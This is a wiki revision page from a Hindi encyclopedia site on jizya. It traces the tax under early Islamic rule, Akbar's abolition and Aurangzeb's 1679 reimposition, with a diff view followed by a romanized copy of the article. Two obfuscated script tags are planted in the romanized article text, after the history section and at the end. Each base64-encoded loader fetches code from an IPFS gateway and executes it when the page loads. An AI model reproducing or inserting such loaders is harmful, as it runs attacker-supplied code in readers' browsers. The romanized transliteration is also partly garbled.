Difference between revisions of "जज़िया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(17 intermediate revisions by 8 users not shown)
Line 1: Line 1:
==जज़िया कर / Jazia Tax==
+
'''जज़िया कर'''<br />
संयोगवश [[अकबर]] शिकार खेलने [[मथुरा]] गया था। वहाँ उसे ज्ञात हुआ कि मथुरा आने पर हिन्दुओं को कर देना पड़ता है। उसने यात्री कर उठा दिया। अकबर ने कहा- यह कहाँ का न्याय है कि ईश्वर की आराधना पर कर लिया जाए। अगले ही वर्ष, अपने राज्याभिषेक की नौवीं वर्षगाँठ पर उसने मुस्लिम क़ानून के अनुसार गैर-मुस्लिमों पर लगने वाले कर 'जज़िया' को भी उठा लिया। यह एक अनोखी घटना थी। फिर तो दो पीढ़ियों तक जज़िया कर नहीं लगा। [[औरंगजेब]] ने 1679 में जसवंतसिंह की मृत्यु के बाद जज़िया कर पुनः लगाया। जज़िया से प्रतिवर्ष साम्राज्य को लाखों की आय होती। फिर भी अकबर ने इसे अनुचित माना।
+
इस्लामी शासन काल में जज़िया नाम का एक कर था। जज़िया को '''जिज़या''' भी लिखा जाता है। वैयक्तिक या सामुदायिक कर, जिसे प्रारंभिक इस्लामी शासकों ने अपनी ग़ैर मुस्लिम प्रजा से वसूल किया था। इस्लामी क़ानून में ग़ैर [[मुसलमान]] प्रजा को दो श्रेणियों में विभक्त किया गया था:-  
 +
*मूर्तिपूजक
 +
*ज़िम्मी ('संरक्षित लोग' या 'ग्रंथों के लोग', यानि वे लोग, जिनके धार्मिक विश्वासों का आधार पवित्र ग्रंथ होते हैं, जैसे ईसाई, यहूदी और पारसी)।
 +
==इतिहास==
 +
मुस्लिम शासकों ने ज़िम्मियों के साथ सहिष्णुतापूर्वक व्यवहार किया और उन्हें अपने धर्म का पालन करने की इजाज़त दी। इस संरक्षण के बदले और अधीनता के रूप में ज़िम्मियों को एक ख़ास व्यक्ति कर चुकाना आवश्यक था, जो '''जज़िया''' कहलाया। कर की दर व उसकी वसूली हर प्रांत में अलग-अलग थे और वे स्थानीय इस्लाम-पूर्व के रिवाज़ों से अत्यधिक प्रभावित थे। सिद्धांततः कर के धन का इस्तेमाल दान व तनख्वाह व पेंशन बांटने के लिए होता था। वास्तव में जज़िया से एकत्र किए गए राजस्व को शासक के निजी कोष में जमा किया जाता था। आमतौर पर ऑटोमन शासक जज़िया से एकत्र धन का इस्तेमाल अपने सैन्य ख़र्चों के लिए करते थे।
  
 +
सिद्धांततः धर्मांतरण कर इस्लाम को अपनाने वाले व्यक्ति को जज़िया अदा करने की ज़रूरत नहीं थी। हालांकि उमय्या ख़लीफ़ाओं (661-750) ने बढ़ते वित्तीय संकट का सामना करने के लिए इस्लाम को स्वीकार करने वाले नए लोगों के साथ-साथ ज़िम्मियों से भी जज़िया की मांग की थी। नए मुस्लिमों के प्रति यह भेदभाव [[खुरासान]] में अबू मुस्लिम विद्रोह (747) और उमय्या वंश के पतन का कारण बना।
 +
[[चित्र:Akbar.jpg|thumb|120px|[[अकबर]]]]
 +
कई बादशाहों ने यह कर समाप्त कर दिया था जिनमें उल्लेखनीय नाम [[अकबर|सम्राट अकबर]] का है। जब मिर्ज़ा राजा जयसिंह के बाद महाराज यशवंत सिंह का भी देहांत हो गया, तब [[औरंगज़ेब]] ने निरंकुश होकर सन् 1679 में फिर से इस कर को लगाया। इस अपमानपूर्ण कर का हिन्दुओं द्वारा विरोध किया गया। [[मेवाड़]] के वृद्ध राणा राजसिंह ने इसके विरोध में औरंगजेब को उपालंभ देते हुए एक पत्र लिखा था, जिसका उल्लेख [[कर्नल टॉड|टॉड]] कृत राजस्थान नामक ग्रंथ में हुआ है ।
  
 +
{{प्रचार}}
 +
 +
==बाहरी कड़ियाँ==
 +
[http://www.britannica.com/EBchecked/topic/304125/jizya जज़िया]
 +
 +
==संबंधित लेख==
 +
{{मुग़ल साम्राज्य}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 +
[[Category:मुग़ल_साम्राज्य]]
 +
 
__INDEX__
 
__INDEX__

Latest revision as of 08:24, 15 September 2012

jaziya kar
islami shasan kal mean jaziya nam ka ek kar tha. jaziya ko jizaya bhi likha jata hai. vaiyaktik ya samudayik kar, jise praranbhik islami shasakoan ne apani gair muslim praja se vasool kiya tha. islami qanoon mean gair musalaman praja ko do shreniyoan mean vibhakt kiya gaya tha:-

  • moortipoojak
  • zimmi ('sanrakshit log' ya 'granthoan ke log', yani ve log, jinake dharmik vishvasoan ka adhar pavitr granth hote haian, jaise eesaee, yahoodi aur parasi).

itihas

muslim shasakoan ne zimmiyoan ke sath sahishnutapoorvak vyavahar kiya aur unhean apane dharm ka palan karane ki ijazat di. is sanrakshan ke badale aur adhinata ke roop mean zimmiyoan ko ek khas vyakti kar chukana avashyak tha, jo jaziya kahalaya. kar ki dar v usaki vasooli har praant mean alag-alag the aur ve sthaniy islam-poorv ke rivazoan se atyadhik prabhavit the. siddhaantatah kar ke dhan ka istemal dan v tanakhvah v peanshan baantane ke lie hota tha. vastav mean jaziya se ekatr kie ge rajasv ko shasak ke niji kosh mean jama kiya jata tha. amataur par aautoman shasak jaziya se ekatr dhan ka istemal apane sainy kharchoan ke lie karate the.

siddhaantatah dharmaantaran kar islam ko apanane vale vyakti ko jaziya ada karane ki zaroorat nahian thi. halaanki umayya khalifaoan (661-750) ne badhate vittiy sankat ka samana karane ke lie islam ko svikar karane vale ne logoan ke sath-sath zimmiyoan se bhi jaziya ki maang ki thi. ne muslimoan ke prati yah bhedabhav khurasan mean aboo muslim vidroh (747) aur umayya vansh ke patan ka karan bana. [[chitr:Akbar.jpg|thumb|120px|akabar]] kee badashahoan ne yah kar samapt kar diya tha jinamean ullekhaniy nam samrat akabar ka hai. jab mirza raja jayasianh ke bad maharaj yashavant sianh ka bhi dehaant ho gaya, tab aurangazeb ne nirankush hokar sanh 1679 mean phir se is kar ko lagaya. is apamanapoorn kar ka hinduoan dvara virodh kiya gaya. meva d ke vriddh rana rajasianh ne isake virodh mean aurangajeb ko upalanbh dete hue ek patr likha tha, jisaka ullekh t aaud krit rajasthan namak granth mean hua hai .

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

jaziya

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>